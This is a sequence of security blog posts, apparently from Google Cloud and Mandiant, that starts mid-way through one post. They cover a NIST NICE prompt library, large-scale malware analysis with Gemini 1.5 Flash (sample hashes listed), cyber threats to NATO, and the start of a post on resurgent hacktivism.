1. Structured Organization and Output withinAI Studio: Leveraging the table formatting capabilities of Google AI Studio, we organized our prompts and their corresponding outputs in a structured table format. This format included columns for TKS ID, TKS Description, Conceptual Prompt, Scenario-Based Prompt, and Knowledge Check Prompt. This streamlined approach allowed for easy review, analysis, and direct export into Google Sheets for further management and refinement of our comprehensive prompt library.

Your AI-Powered Cybersecurity Toolkit: Unveiled!

We are thrilled to announce the release of our meticulously crafted library of NIST NICE-aligned prompts. In a groundbreaking move to democratize cybersecurity education, we're making this invaluable resource freely available to the entire cybersecurity community.

Here, you'll find a glimpse of the treasure trove of prompts that await you:

TKS ID

TKS Description

Conceptual Prompt

Scenario-Based Prompt

Knowledge Check Prompt

K0833

Knowledge of cyberattack actor characteristics

"Identify different types of cyberattack actors, such as nation-states, cyber criminals, and hacktivists.”

"A sophisticated cyberattack is attributed to a state-sponsored actor. Describe the typical characteristics and motivations of this type of attacker."

"Compare and contrast the motives and methods of hacktivists and cybercriminals.”

aside_block

<ListValue: [StructValue([('title', 'Google Gemini AI Prompts'), ('body', <wagtail.rich_text.RichText object at 0x3e1df929b220>), ('btn_text', 'Get the prompts!'), ('href', 'https://docs.google.com/spreadsheets/u/1/d/e/2PACX-1vQBzljgM47QnO9F8iE33DkvQ96Ow5jNG01y7mxkDgZl0NEMEwsDBhFErI1rMz3GaysLZb2hNXAO4k2y/pubhtml#'), ('image', None)])]>

By harnessing the power of this AI-driven resource, you can take control of your cybersecurity learning journey. Explore the prompts, challenge yourself, and discover new ways to strengthen your expertise.

Take Action: Elevate Your Cybersecurity Expertise with AI

Congratulations! You now have access to a treasure trove of AI-powered prompts designed to accelerate your mastery of the NIST NICE framework. But how can you effectively incorporate these prompts into your daily learning routine? Here are some practical tips and strategies:

1. Identify Your Goals: Start by clearly defining your learning objectives. Are you aiming to strengthen your knowledge in a specific NICE category or specialty area? Are you preparing for a certification exam or a career transition? Once you know your goals, you can select the most relevant prompts to focus on.
2. Integrate Prompts into Your Daily Routine: Set aside dedicated time each day to engage with the prompts. You can use them as a warm-up exercise before diving into other learning materials, as a way to test your knowledge after studying, or as a creative spark to brainstorm new ideas.
3. Experiment with Different Learning Styles: The beauty of prompts is their versatility. You can use them for solo study, group discussions, or even as a basis for creating presentations or training materials. Don't be afraid to experiment and find what works best for you.
4. Embrace the Interactive Nature of AI: Large language models like Google Gemini are designed to engage in dialogue. Ask follow-up questions, challenge the AI's responses, and use the prompts as a springboard for deeper exploration of the topics at hand.
5. Track Your Progress: As you work through the prompts, keep track of your responses, insights, and any questions that arise. This will help you monitor your progress, identify areas for further improvement, and measure the impact of your AI-powered learning journey.

The NIST NICE Framework and Security-Specific LLMs

The NIST NICE framework, beyond serving as a guide for human professionals, is also a valuable tool in the development of security-specific LLM agents. The framework's structured knowledge and comprehensive categorization of tasks provide a rich resource for training and building tuned agents. By aligning LLMs to particular TKS statements within the NICE framework, developers focus the models' understanding of cybersecurity concepts, terminology, and real-world scenarios.

The granular nature of TKS statements within the NICE framework makes them ideal to focus AI agents for specific cybersecurity tasks. For example, TKS statements related to "risk analysis" or "incident response" can be used to focus agents that specialize in these areas. By tailoring prompts to specific TKSs, we can create AI agents that are highly proficient in performing their assigned tasks and capable of providing valuable insights and recommendations to human analysts.

Additionally, when paired with a tuned model, such as Google's SecLM, the outputs will be further aligned to the daily needs of cybersecurity practitioners. By training on a massive corpus of security-related data, including information aligned with the NICE framework, SecLM has developed a sophisticated understanding of security threats, vulnerabilities, and mitigation strategies. This enables SecLM to perform a wide range of tasks, from threat detection and analysis to code review and security policy generation.

The integration of the NICE framework into the development of security-specific LLMs like SecLM represents a significant step forward in the field of AI-driven cybersecurity. By harnessing the structured knowledge of the framework and the power of LLMs, we are creating tools that can augment human expertise, accelerate threat detection and response, and ultimately strengthen our defenses against an ever-evolving threat landscape.

A Special Thanks to Google Gemini

We would be remiss if we didn't acknowledge the incredible power and versatility of Google Gemini. This cutting-edge language model not only enabled us to rapidly generate and iterate on thousands of NIST NICE-aligned prompts, but it has also been an invaluable collaborator in the creation of this very blog post. The future of AI in cybersecurity is bright, and we're excited to continue exploring its limitless potential with Gemini at our side.

Expanding the Horizon of Cybersecurity with AI

The release of our NIST NICE-aligned prompt library is just the first step in our mission to empower cybersecurity professionals with the power of AI. We are committed to continually exploring innovative ways to leverage AI to enhance cybersecurity capabilities for both individuals and organizations.

Stay tuned for upcoming blog posts where we'll delve into advanced prompt engineering techniques, share real-world applications of AI in cybersecurity, and explore opportunities to utilize AI in your daily workflow. Our goal is to create a vibrant community of learners, practitioners, and innovators who are passionate about harnessing the transformative potential of AI to strengthen our collective defense against cyber threats.

Written by:
Bernardo Quintero, Founder of VirusTotal and Security Director, Google Cloud Security
Alex Berry, Security Manager of the Mandiant FLARE Team, Google Cloud Security
Ilfak Guilfanov, author of IDA Pro and CTO, Hex-Rays
Vijay Bolina, Chief Information Security Officer & Head of Cybersecurity Research, Google DeepMind

 

Executive Summary

• Following up on our Gemini 1.5 Pro for malware analysis post, this time around we tested to see if our light-weight Gemini 1.5 Flash model is capable of large-scale malware dissection.
• The Gemini 1.5 Flash model was created to optimize efficiency and speed while maintaining performance, which allows us to utilize Gemini 1.5 Flash to process up to 1,000 requests per minute and 4 million tokens per minute.
• To evaluate the real-world performance of our malware analysis pipeline, we analyzed 1,000 Windows executables and DLLs randomly selected from VirusTotal's incoming stream. The system effectively resolved cases of false positives, samples with obfuscated code, and malware with zero detections on VirusTotal.
• On average, Gemini 1.5 Flash processed each file in 12.72 seconds (excluding the unpacking and decompilation stages), providing accurate summary reports in human-readable language.

Introduction

In our previous post, we explored how Gemini 1.5 Pro could be used to automate the reverse engineering and code analysis of malware binaries. Now, we're focusing on Gemini 1.5 Flash, Google's new lightweight and cost-effective model, to transition that analysis from the lab to a production-ready system capable of large-scale malware dissection. With the ability to handle 1 million tokens, Gemini 1.5 Flash offers impressive speed and can manage large workloads. To support this, we've built an infrastructure on Google Compute Engine, incorporating a multi-stage workflow that includes scaled unpacking and decompilation stages. While promising, this is just the first step on a long journey to overcome accuracy challenges and unlock AI's full potential in malware analysis.

VirusTotal analyzes an average of 1.2 million unique new files each day, ones that have never been seen before on the platform. Nearly half of these are binary files (PE_EXE, PE_DLL, ELF, MACH_O, APK, etc.) that could benefit from reverse engineering and code analysis. Traditional, manual methods simply cannot keep pace with this volume of new threats. Building a system to automatically unpack, decompile, and analyze this quantity of code in a timely and efficient manner is a significant challenge, one that Gemini 1.5 Flash is designed to help address.

Building on the extensive capabilities of Gemini 1.5 Pro, the Gemini 1.5 Flash model was created to optimize efficiency and speed while maintaining performance. Both models share the same robust, multimodal capabilities and are capable of handling a context window of over 1 million tokens; however, Gemini 1.5 Flash is particularly designed for rapid inference and cost-effective deployment. This is achieved through parallel computation of attention and feedforward components, as well as the use of online distillation techniques. The latter enables Flash to learn directly from the larger and more complex Pro model during training. These architectural optimizations allow us to utilize Gemini 1.5 Flash to process up to 1,000 requests per minute and 4 million tokens per minute.

To illustrate how this pipeline works, we'll first showcase examples of Gemini 1.5 Flash analyzing decompiled binaries. Then we'll briefly outline the preceding steps of unpacking and decompilation at scale.

Analysis Speed and Examples

To evaluate the real-world performance of our malware analysis pipeline, we analyzed 1,000 Windows executables and DLLs randomly selected from VirusTotal's incoming stream. This selection ensured a diverse range of samples, encompassing both legitimate software and various types of malware. The first thing that struck us was the speed of Gemini 1.5 Flash. This aligns with the performance benchmarks highlighted in the Google Gemini team's paper, where Gemini 1.5 Flash consistently outperformed other large language models in terms of text generation speed across multiple languages. 

The fastest processing time we observed was a mere 1.51 seconds, while the slowest was 59.60 seconds. On average, Gemini 1.5 Flash processed each file in 12.72 seconds. It's important to note that these times exclude the unpacking and decompilation stages, which we'll explore further later in this blog post.

These processing times are influenced by factors such as the size and complexity of the input code, and the length of the resulting analysis. Importantly, these measurements encompass the entire end-to-end process: from sending the decompiled code to the Gemini 1.5 Flash API on Vertex AI, through the model's analysis, to receiving the complete response back on our Google Compute Engine instance. This end-to-end perspective highlights the low latency and speed achievable with Gemini 1.5 Flash in real-world production scenarios.

Example 1: Dispelling a False Positive in 1.51 Seconds

Out of the 1,000 binaries we analyzed, this one was processed the fastest, highlighting the remarkable speed of Gemini 1.5 Flash. The file goopdate.dll (103.52 KB) triggered a single anti-virus detection on VirusTotal, a common occurrence that often requires time-consuming manual review.

Imagine this file triggered an alert in your SIEM system and you need answers fast. Gemini 1.5 Flash delivers, analyzing the decompiled code in just 1.51 seconds and providing a clear explanation: the file is a simple executable launcher for the "BraveUpdate.exe" application, likely a web browser component. This rapid, code-level insight allows analysts to confidently dismiss the alert as a false positive, preventing unnecessary escalation and saving valuable time and resources.

Example 2: Resolving Another False Positive

In another example, the file BootstrapPackagedGame-Win64-Shipping.exe (302.50 KB) was flagged by two anti-virus engines on VirusTotal, again requiring further scrutiny.

Gemini 1.5 Flash analyzes the decompiled code in just 4.01 seconds, revealing that the file is a game launcher. Gemini details the sample's functionality, which includes checking for prerequisites like Microsoft Visual C++ Runtime and DirectX, locating and executing redistributable installers, and ultimately launching the main game executable. This level of understanding allows analysts to confidently categorize the file as legitimate, avoiding unnecessary time and effort spent on a potential false positive.

Example 3: Longest Processing with Obfuscated Code

The file svrwsc.exe (5.91 MB) stood out during our analysis for requiring the longest processing time: 59.60 seconds. Factors such as the size of the decompiled code and the presence of obfuscation techniques like XOR encryption likely contributed to the longer analysis time. Nevertheless, Gemini 1.5 Flash completed its analysis in less than a minute. This is a notable achievement, considering that manually reverse engineering such a binary could take a human analyst several hours.

Gemini correctly determined the sample to be malicious and pinpointed its backdoor functionality, which is designed to exfiltrate data and connect to command-and-control (C2) servers located on Russian domains. The analysis delivers a wealth of IOCs such as potential C2 server URLs, mutexes used for process synchronization, altered registry keys, and suspicious file names. This information enables security teams to swiftly investigate and respond to the threat.

Example 4: Cryptominer

This example shows Gemini 1.5 Flash analyzing the decompiled code of a cryptominer named colto.exe. It's important to note that the model only receives the decompiled code as input, with no additional metadata or context from VirusTotal. In just 12.95 seconds, Gemini 1.5 Flash delivered a comprehensive analysis, identifying the malware as a cryptominer, highlighting obfuscation techniques, and extracting key IOCs, such as the download URL, file path, mining pool, and wallet address.

Example 5: Understanding Legitimate Software with Agnostic Approach

This example showcases Gemini 1.5 Flash analyzing a legitimate 3D viewer application named 3DViewer2009.exe in 16.72 seconds. Even with goodware, understanding a program's functionality can be valuable for security purposes. It's important to highlight that, just like in the previous examples, the model only receives the decompiled code for analysis without any additional metadata from VirusTotal, such as whether the binary is digitally signed by a trusted entity. This information is often taken into account by traditional malware detection systems, but we are adopting a code-centric approach.

Gemini 1.5 Flash successfully identifies the core purpose of the application (loading and displaying 3D models) and even recognizes the specific type of 3D data it handles (DTM). The analysis highlights the use of OpenGL for rendering, configuration file loading, and custom file classes for data management. This level of understanding could help security teams differentiate between legitimate software and malware that might attempt to mimic its behavior. 

This agnostic approach to code analysis that focuses solely on functionality could be particularly valuable for scrutinizing digitally signed binaries, which might not always receive the same level of security analysis as unsigned files. This opens up new possibilities for identifying potentially malicious behavior, even within supposedly trusted software.

Example 6: Unmasking a Zero-Hour Keylogger

This example showcases the true power of analyzing code for malicious behavior: detecting threats that traditional security solutions miss. The executable AdvProdTool.exe (87KB) was submitted to VirusTotal, where it evaded all anti-virus engines, sandboxes, and detection systems at the time of its initial upload and analysis. However, Gemini 1.5 Flash uncovers its true nature. In just 4.7 seconds, the model analyzes the decompiled code, identifies it as a keylogger, and even reveals the IP address and port where it exfiltrates stolen data.

The analysis highlights the code's use of OpenSSL to establish a secure TLS connection to the IP address on port 443. Crucially, Gemini points out the suspicious use of keyboard input capture functions (GetAsyncKeyState, GetKeyState) and their connection to data transmission over the secure channel (SSL_write).

This example underscores the potential of code analysis to identify zero-hour threats in early stages of development, as this keylogger appears to be. It also highlights a critical advantage of Gemini 1.5 Flash: analyzing the raw functionality of code can reveal malicious intent, even when disguised by metadata or detection evasion techniques.

Workflow Overview

Our malware analysis pipeline consists of three key stages: unpacking, decompilation, and code analysis with Gemini 1.5 Flash. Two critical processes drive the first two stages: automated unpacking and decompilation at scale. We leverage Mandiant Backscatter, our internal cloud-based malware analysis service, to dynamically unpack incoming binaries. The unpacked binaries are then processed by a cluster of Hex-Rays Decompilers running on Google Compute Engine. While Gemini is capable of analyzing both disassembled and decompiled code, we've opted for decompilation in our pipeline. The determining factor was decompiled code being 5–10 times more concise than disassembled code, making it a more efficient choice given the token window limitations of large language models. This decompiled code is ultimately fed to Gemini 1.5 Flash for analysis.

By orchestrating this workflow on Google Cloud, we can process a massive number of binaries, including the entire daily influx of over 500,000 new binaries submitted to VirusTotal.

Mandiant Backscatter

Our internal Mandiant Malware Analysis Backscatter Service, hosted on the Google Compute Engine, provides scalable malware configuration extraction. As part of extracting configurations, Backscatter also performs malware deobfuscation, decryption and unpacking in-line with our VirusTotal pipeline to decompose the malware into artifacts. From these artifacts, configurations are extracted and the resulting IOCs are used to identify and track malware threats and actors across hundreds of malware families in our Google Threat Intelligence platform. The artifacts, including unpacked binaries, are also resubmitted back into the pipeline, allowing tools such as Gemini 1.5 Flash to perform additional processing to extend our knowledge of what operations the malware is performing with the IOCs identified in previous stages.   

Hex-Rays Decompiler

Our cluster of Hex-Rays IDA Pro Decompilers, hosted on Google Compute Engine, provides the scalable decompilation power necessary for this pipeline. We leverage the new IDA LIB, a headless version of IDA Pro designed for automated workflows, which is scheduled for release in Q3 2024. The cluster seamlessly integrates with our pipeline, reading unpacked binaries from a Google Cloud Pub/Sub queue fed by Mandiant Backscatter. The resulting decompiled pseudo-C code is then stored in a Google Cloud Storage bucket, ready for analysis by Gemini 1.5 Flash. Currently, each node in the cluster can decompile more than 3,000 files per hour, ensuring we can keep pace with the high volume of incoming binaries.

Challenges and Ongoing Development

As expected, our tests highlighted a crucial aspect of this pipeline: the performance of Gemini 1.5 Flash is heavily dependent on the quality of the preceding unpacking and decompilation stages. For instance, if the unpacking phase fails to fully unpack a new or unknown packer, the decompiler will only be able to extract the code of the packer itself, not the original program logic hidden within. In such cases, Gemini correctly reports that it's analyzing a program performing unpacking, decryption, or deobfuscation operations, and that it won't be able to analyze the true purpose of the code concealed by the packer. 

Similarly, the quality of the decompiled code directly impacts Gemini's ability to understand and analyze the program's behavior. The decompiled code is the raw material for Gemini's analysis, so any errors or inconsistencies in this code will propagate to the final report. Moreover, Gemini must also contend with various code-level obfuscation methods, including new approaches employed by attackers, requiring it to continuously adapt and improve its analysis capabilities in this evolving landscape.

This interdependence underscores the importance of continuously improving all three stages of the pipeline. A weakness in any part of this sequential workflow will directly impact the performance of the subsequent phases. Improved outputs from these stages directly translate to more successful analysis by Gemini. Therefore, our ongoing development efforts focus not only on enhancing Gemini's analytical capabilities but also on refining the unpacking and decompilation stages to ensure they deliver the highest quality output for analysis.

On the decompilation side, we are working closely with Hex-Rays to enhance their decompiler, focusing on three key areas:

• Improved Language-Specific Structure Recognition: We aim to enhance the decompiler's ability to recognize structures unique to specific programming languages. This includes elements like try-catch statements or class member definitions within C++, Rust, and Golang code. By adding a new semantic layer to the decompiler, we can enable it to interpret the underlying code more effectively. This leads to more accurate and readable output, ultimately benefiting Gemini's analysis.
• More Meaningful Function and Variable Naming: Clear and descriptive names for functions and variables within the decompiled code significantly aid Gemini's analysis. We're exploring techniques to generate such names during the decompilation process, including the possibility of integrating Gemini for this purpose.
• Richer Contextual Information: Beyond improved decompiled code, we're investigating methods to provide the model with richer contextual data. This might include visual representations like data flow diagrams and control flow graphs, or even a complete export of IDA Pro's IDB. This additional information can provide valuable insights into the program's overall structure and logic, enabling a more thorough and accurate analysis.

Google Threat Intelligence: The Next Evolution

This is just the beginning of our exploration into leveraging AI for large-scale threat analysis. We are excited to announce that these types of code analysis reports will soon be integrated into VirusTotal's Code Insight section. This integration will provide the VirusTotal community with valuable insights into the behavior of binary files, powered by the speed and scalability of Gemini 1.5 Flash.

For an even more powerful analysis experience, we are developing an advanced version of this pipeline within Google Threat Intelligence. This implementation will leverage the capabilities of Gemini 1.5 Pro enhanced by AI agents that can use specialized malware analysis tools and correlate threat information from across Google, Mandiant, and VirusTotal. This advanced analysis will be available within our Private Scanning service, ensuring the confidentiality of the content processed. Watch our recent webinar for more on Gemini in Google Threat Intelligence.

We will continue to share our progress and new advancements in AI-driven threat analysis as we strive to make the digital world a safer place. Here at GSEC Malaga, we are dedicated to pushing the boundaries of what's possible in cybersecurity and exploring new ways to apply AI to protect users from evolving threats.

Samples Details

The following table contains details on the binary samples discussed in this post.

Filename

SHA-256

goopdate.dll

0d2115d3de900bcd5aeca87b9af0afac90f99c5a009db7c162101a200fbfeb2c

BootstrapPackagedGame-Win64-Shipping.exe

07db922be22e4feedbacea7f92983f51404578bd0c495abaae3d4d6bf87ae6d0

svrwsc.exe

0cdb71e81b07247ee9d4ea1e1005c9454a5d3eb5f1078279a905f0095fd88566

colto.exe

091e505df4290f1244b3d9a75817bb1e7524ac346a2f28b0ef3c689c445beb45

3DViewer2009.exe

08f20e0a2d30ba259cd3fe2a84ead6580b84e33abfcec4f151c5b2e454602f81

AdvProdTool.exe

04af0519d0dbe20bc8dc8ba4d97a791ae3e3474c6372de83087394d219babd47

Written by: John Hultquist

 

As North Atlantic Treaty Organization (NATO) members and partners gather for a historic summit, it is important to take stock of one of its most pressing challenges—the cyber threat. The Alliance faces a barrage of malicious cyber activity from all over the globe, carried out by emboldened state-sponsored actors, hacktivists, and criminals who are willing to cross lines and carry out activity that was previously considered unlikely or inconceivable. In addition to military targets, NATO must consider the risks that hybrid threats like malicious cyber activity pose to hospitals, civil society, and other targets, which could impact resilience in a contingency. The war in Ukraine is undoubtedly linked to escalating cyber threat activity, but many of these threats will continue to grow separately and in parallel. 

NATO must contend with covert, aggressive malicious cyber actors that are seeking to gather intelligence, preparing to or currently attacking critical infrastructure, and working to undermine the Alliance with elaborate disinformation schemes. In order to protect its customers and clients, Google is closely tracking cyber threats, including those highlighted in this report; however, this is just a glimpse at a much larger and evolving landscape.

Cyber Espionage

NATO's adversaries have long sought to leverage cyber espionage to develop insight into the political, diplomatic, and military disposition of the Alliance and to steal its defense technologies and economic secrets. However, intelligence on the Alliance in the coming months will be of heightened importance. This year's summit is a transition period, with the appointment of Mark Rutte as the new Secretary General and a number of adaptations expected to be rolled out to shore up the Alliance's defense posture and its long-term support for Ukraine. Successful cyber espionage from threat actors could potentially undermine the Alliance's strategic advantage and inform adversary leadership on how to anticipate and counteract NATO's initiatives and investments.

NATO is targeted by cyber espionage activity from actors around the world with varying capabilities. Many still rely on technically simple but operationally effective methods, like social engineering. Others have evolved and elevated their tradecraft to levels that distinguish themselves as formidable adversaries for even the most experienced defenders.

APT29 (ICECAP)

Publicly attributed to the Russian Foreign Intelligence Services (SVR) by several governments, APT29 is heavily focused on diplomatic and political intelligence collection, principally targeting Europe and NATO member states. APT29 has been involved in multiple high-profile breaches of technology firms that were designed to provide access to the public sector. In the past year, Mandiant has observed APT29 targeting technology companies and IT service providers in NATO member countries to facilitate third-party and software supply chain compromises of government and policy organizations.The actor is extremely adept in cloud environments and particularly focused on covering their tracks, making them hard to detect and track, and especially difficult to expel from compromised networks.

APT29 also has a long history of spear-phishing campaigns against NATO members with a focus on diplomatic entities. The actor has successfully breached executive agencies across Europe and the U.S. on several occasions. We have also seen them actively targeting political parties in Germany as well as in the U.S. with the likely objective of collecting intelligence on future government policy.

Cyber Espionage from China

Cyber espionage activity from China has undergone significant evolution in recent years, transitioning away from loud, easily attributed operations to a greater focus on stealth. Technical investments have amplified the challenge to defenders and bolstered successful campaigns against government, military, and economic targets in NATO member states.

Chinese cyber espionage increasingly features techniques such as:

• Targeting of the network edge and exploiting zero-day vulnerabilities in security devices and other internet-facing network infrastructure to reduce opportunities for defender detection. By relying less on social engineering, these operators have reduced the likelihood of being identified by users or related controls. In 2023, these actors exploited 12 zero-days (software or hardware vulnerabilities that are unknown to the vendor, have no patch or fix available, and can be exploited before they can be addressed), many of which were in security products that reside on the network edge. These products often lack the ability for endpoint detection, making them an ideal beachhead in compromised networks.
• The use of operational relay box (ORB) networks to hide the origin of malicious traffic. Threat actors hide their malicious traffic through proxies, which act as intermediaries between them and the internet, but these proxies can be reliably tracked. Actors are now leveraging large ephemeral networks of shared and compromised proxies known as ORBs. These networks are very difficult to track and complicate the ability for defenders to share intelligence on infrastructure.
• Living off the land to reduce opportunities for defender detection. Some actors are forgoing the use of malware and leveraging other methods to conduct intrusions. Living-off-the-land techniques use legitimate tools, features, and functions available in the system to traverse networks and carry out malicious activity. Defenders are at a serious disadvantage without the ability to detect malware and are less able to share intelligence on related activity.

These techniques are not only leveraged by Chinese threat actors. Russian actors such as APT29, APT28, and APT44 have used them as well.

Disruptive and Destructive Cyberattacks

Disruptive and destructive cyberattacks are on the rise, posing direct and indirect consequences to the NATO alliance. In recent years, Iranian and Russian state actors have demonstrated a willingness to carry out these attacks on NATO members, though they have hidden their hands behind false fronts who publicly take credit for the operations. For example, Mandiant described a 2022 destructive attack against the government of Albania for which an alleged hacktivist group called "HomeLand Justice" claimed credit, though the U.S. Government ultimately attributed the attack to Iranian actors.

State actors are also compromising the critical infrastructure of NATO members in preparation for future disruptions, even as they demonstrate their ability to carry out complex attacks on highly sensitive operational technology systems in Ukraine. This activity proves these actors have the means and motive to disrupt NATO's critical infrastructure.

In addition to cyberattacks from state actors, disruptions by hacktivists and criminal actors are no longer a nuisance that can be easily ignored. A global resurgence of hacktivists has led to significant attacks against the public and private sector, and criminal activity has become so devastating it has risen to the level of a national security concern.

APT44 (Sandworm, FROZENBARENTS)

APT44 has been involved in many of the most high-profile disruptive cyberattacks in the world, including the global destructive attack NotPetya, attacks on the Pyeongchang Olympic games, and several blackouts in Ukraine. The actor, which is tied to Russian military intelligence, has carried out technically complex disruptions of sensitive operational technology as well as destructive attacks with broad effects. The majority of disruptive attacks in Ukraine have been attributed to APT44, and the actor has been connected to limited attacks in NATO countries since the war began.

In October 2022, an actor believed to be APT44 deployed PRESSTEA (aka Prestige) ransomware against logistics entities in Poland and Ukraine. The ransomware could not be unlocked and effectively acted as a destructive attack; activity may have been designed to signal the group's ability to threaten supply lines transiting lethal aid to Ukraine. By this operation, APT44 has shown a willingness to use a disruptive capability intentionally against a NATO member country, which reflects the group's penchant for risk taking.

Hacktivists

A global resurgence of politically motivated hacking, or hacktivism, is largely tied to geopolitical flashpoints like the Russian invasion of Ukraine. Despite a strong focus on NATO member states, these actors have had inconsistent effects. Many operations fail to cause lasting disruptions and are ultimately designed to garner attention and create a false impression of insecurity.

Despite their limitations, these actors cannot be completely ignored. Their attacks regularly garner media attention in target countries, and their methods could create serious consequences under the right circumstances. Distributed denial-of-service (DDOS) attacks, one of their most preferred methods, are relatively superficial, but could be leveraged during events such as elections for greater impact. Furthermore, some hacktivists, such as the pro-Russian group Cyber Army Russia Reborn (CARR), are experimenting with more substantial attacks on critical infrastructure. CARR, which has murky ties to APT44, has disrupted water supplies at U.S., Polish, and French facilities in a series of simple but brash incidents.

Cyber Criminals

Financially motivated disruptions caused by ransomware are already causing severe consequences across critical infrastructure in NATO states, leading to patient care disruptions in hospitals, energy shortages, and government services outages. While some criminals have vowed to avoid targeting this critical infrastructure, many remain undeterred. Healthcare institutions in the U.S. and Europe have been repeatedly targeted by both Russian-speaking criminals seeking financial gain and North Korean state actors aiming to fund their espionage activities. The ability of these actors to operate from jurisdictions with lax cyber crime enforcement or extradition agreements, coupled with the lucrative nature of ransomware attacks, suggests that this threat will continue to escalate in the near future.

Disinformation and Information Operations

Information operations have become a consistent feature of cyber threat activity in the last decade, steadily growing as conflicts and geopolitical strain has intensified. These operations encompass a wide range of tactics, from "troll farm" social media manipulation to complex schemes involving network intrusions. Russian and Belarusian information operations have particularly targeted NATO member states, primarily aiming to undermine the Alliance's unity and objectives.

Some cyber espionage actors who are predominantly focused on covert intelligence collection also engage in information operations. Groups such as APT28 and COLDRIVER have publicly leveraged stolen information in hack-and-leak campaigns, while other actors, such as UNC1151, have employed their intrusion capabilities in other complex information operations. These efforts aim to manipulate public opinion, sow discord, and advance political agendas through the dissemination of false and misleading information.

At Google, we have worked aggressively across products, teams, and regions to counter these activities where they violate our policies and disrupt overt and covert information operations campaigns. Examples of this enforcement include disruption of YouTube channels, blogs, AdSense accounts, and domains removed from Google News surfaces, as we report on a quarterly basis in the TAG Bulletin. 

Prigozhin's Information Operations Survive

Despite the death of their sponsor, remnants of deceased Russian businessman Yevgeniy Prigozhin's disinformation empire are still functioning, albeit much less effectively. These surviving campaigns continue to promote disinformation and other pro-Russia narratives on multiple social media platforms, most recently with an emphasis on alternative platforms, across multiple regions.

The narratives propagated by these operations call for NATO's dismantlement and imply that the Alliance is a source of global instability. They also criticize the leaders of NATO member states. Major geopolitical developments, such as the launch of Russia's full-scale invasion of Ukraine in 2022 and other Russian strategic priorities, significantly influence the content promoted by these campaigns. The ongoing support of NATO and its member states for Ukraine has made the Alliance a prime target both directly and indirectly through its involvement in issues perceived as challenging to Russia's strategic interests.

Ghostwriter/UNC1151

The Ghostwriter information operations campaign, at least partially linked to Belarus, has been active since at least 2016, primarily targeting Belarus's neighbors: Lithuania, Latvia, Poland, and to a lesser extent, Ukraine. The campaign receives technical support from UNC1151, a cyber espionage group known for its malicious activities. Ghostwriter, notorious for its cyber-enabled influence operations, has consistently prioritized the promotion of anti-NATO narratives. In April 2020, for example, a Ghostwriter operation falsely claimed that NATO troops were responsible for bringing COVID-19 to Latvia. 

Ghostwriter activity has sought to undermine regional governments and their security cooperation. This includes operations that leveraged the compromised social media accounts of notable Polish individuals to promote content attempting to tarnish the reputation of Polish politicians, including through the dissemination of potentially compromising photographs. Since 2022, observed Ghostwriter operations have maintained these established campaign objectives while also expanding narratives to include the Russian invasion. In April 2023, for example, a Ghostwriter operation alleged that Poland and Lithuania were recruiting their residents to join a multinational brigade that would deploy to Ukraine. 

COLDRIVER

COLDRIVER is a Russian cyber espionage actor that has been publicly linked to Russia's domestic intelligence agency, the Federal Security Service (FSB). The actor regularly carries out credential phishing campaigns against high-profile individuals in non-governmental organizations (NGOs) as well as former intelligence and military officers. Notably, information COLDRIVER stole from victim mailboxes has been used in hack-and-leak operations. Information stolen by COLDRIVER was leaked in 2022 in an effort to exacerbate Brexit-related political divisions in UK politics. Prior to that incident, the actor leaked details of U.S.-UK trade agreements ahead of the 2019 UK election. COLDRIVER primarily targets NATO countries and shifted in 2022 to include the Ukrainian Government and organizations supporting the war in Ukraine. March 2022 also marked the first time COLDRIVER campaigns targeted the military of multiple European countries as well as a NATO Centre of Excellence. 

Outlook

Unlike many other domains of conflict, the cyber realm is characterized by aggressive activity that persists irrespective of a state of armed conflict. Nevertheless, geopolitics are an important driver of this activity. Significantly, the Russian invasion of Ukraine has coincided with bolder and reckless cyber activity against NATO allies. These threats are unlikely to abate in the near future.

The effects of malicious cyber activity are broad; cyber threats have the potential to affect NATO allies and partners from the political-military arena to the economic and societal underpinnings of the Alliance. Countering these threats, like everything NATO does, requires a collective commitment to defense. NATO must rely on collaboration with the private sector in the same way it draws on the strength of its constituent members. Furthermore, it must harness its greatest advantage against cyber threats—the technological capability of the private sector—to seize the initiative in cyberspace from NATO's adversaries.

Written by: Daniel Kapellmann Zafra, Alden Wahlstrom, James Sadowski, Josh Palatucci, Davyn Baumann, Jose Nazario

 

Since early 2022, Mandiant has observed the revival and intensification of threat activity from actors leveraging hacktivist tactics and techniques. This comes decades after hacktivism first emerged as a form of online activism and several years since many defenders last considered hacktivism to be a serious threat. However, this new generation of hacktivism has grown to encompass a more complex and often impactful fusion of tactics different actors leverage for their specific objectives.

Today's hacktivists exhibit increased capabilities in both intrusion and information operations demonstrated by a range of activities such as executing massive disruptive attacks, compromising networks to leak information, conducting information operations, and even tampering with physical world processes. They have leveraged their skills to gain notoriety and reputation, promote political ideologies, and actively support the strategic interests of nation-states. The anonymity provided by hacktivist personas coupled with the range of objectives supported by hacktivist tactics have made them a top choice for both state and non-state actors seeking to exert influence through the cyber domain.

This blog post presents Mandiant's analysis of the hacktivism threat landscape, and provides analytical tools to understand and assess the level of risk posed by these groups. Based on years of experience tracking hacktivist actors, their claims, and attacks, our insight is meant to help organizations understand and prioritize meaningful threat activity against their own networks and equities.

Figure 1: Sample of imagery used by hacktivists to promote their threat activity

Proactive Monitoring of Hacktivist Threats Necessary for Defenders to Anticipate Cyberattacks

Mandiant considers activity to be hacktivism when actors claim to or conduct attacks with the publicly stated intent of engaging in political or social activism. The large scale of hacktivism's resurgence presents a critical challenge to defenders who need to proactively sift through the noise and assess the risk posed by a multitude of actors with ranging degrees of sophistication. While in many cases hacktivist activity represents a marginal threat, in the most significant hacktivist operations Mandiant has tracked, threat actors have deliberately layered multiple tactics in hybrid operations in such a way that the effect of each component magnified the others. In some cases, hacktivist tactics have been deliberately employed by nation-state actors to support hybrid operations that can seriously harm victims. As the volume and complexity of activity grows and new actors leverage hacktivist tactics, defenders must determine how to filter, assess, and neutralize a range of novel and evolving threats. The proactive monitoring of hacktivist threats will bring manifold benefits to defenders:

• Monitoring hacktivism messaging and activity can provide defenders with early warning of threat activity from sophisticated actors. This is not only because of the overt nature of hacktivism, but also because of its use to mask activity from nation-states and criminals.
• The increase in frequency and breadth of hacktivism activity over the last two years represents a threat to a wide range of organizations. Even if most attacks do not result in significant impacts, defenders need to proactively filter through the volume of insignificant activity to identify indications of substantive targeting of their organizations and prepare mitigation strategies.
